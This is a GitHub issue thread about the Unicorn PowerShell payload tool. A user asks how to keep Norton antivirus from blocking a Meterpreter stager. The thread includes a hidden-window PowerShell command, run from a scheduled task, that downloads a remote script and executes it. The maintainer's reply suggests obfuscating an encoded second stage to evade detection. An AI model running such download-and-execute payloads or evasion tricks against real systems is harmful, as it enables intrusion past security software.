### ISSUE TITLE
Norton AV Trouble

### ISSUE THREAD

**Issue by daniellee4002** [trustedsec/unicorn#4]
Hi there, 

I understand that TrustedSec is not responsible for the meterpreter stager, however I thought that this particular case was interesting due to the fact that `SetStageEncoding` was set to true. 

Environment details listed below: 

Norton Security (Full Trial)
Version: 22.5.2.15

![unicorn](https://cloud.githubusercontent.com/assets/13597582/9020886/27f03b28-386a-11e5-913d-a47d430db13f.jpg)

Any feasible way to get around this while still being able to use Meterpreter? Is there any encoding options that I am leaving out?

The payload is being executed with the following Scheduled Task: 

Powershell.exe -NoExit -Windowstyle hidden IEX ((New-Object Net.WebClient).DownloadString('http://pentestbox/powershell_attack.txt'))

Note: I'm not using `powershell_attack.txt` as the filename.

**Comment by daniellee4002** [comment]
After further testing, it seems as if it is only one of two, or both components within Norton : 

`Smart Firewall` & `Instrusion Prevention`
![now working](https://cloud.githubusercontent.com/assets/13597582/9021313/69cfc49a-387f-11e5-9398-633cc0f4caaa.jpg)

**Comment by trustedsec** [comment]
Looks like it's flagging on either the first or second stage (not sure which). This isn't something that I can fix inside of Unicorn. Obfuscation techniques you can house an encoded second stage vs. doing it within Metasploit to get around this. I'm not sure which stage it's flagging out unfortunately.
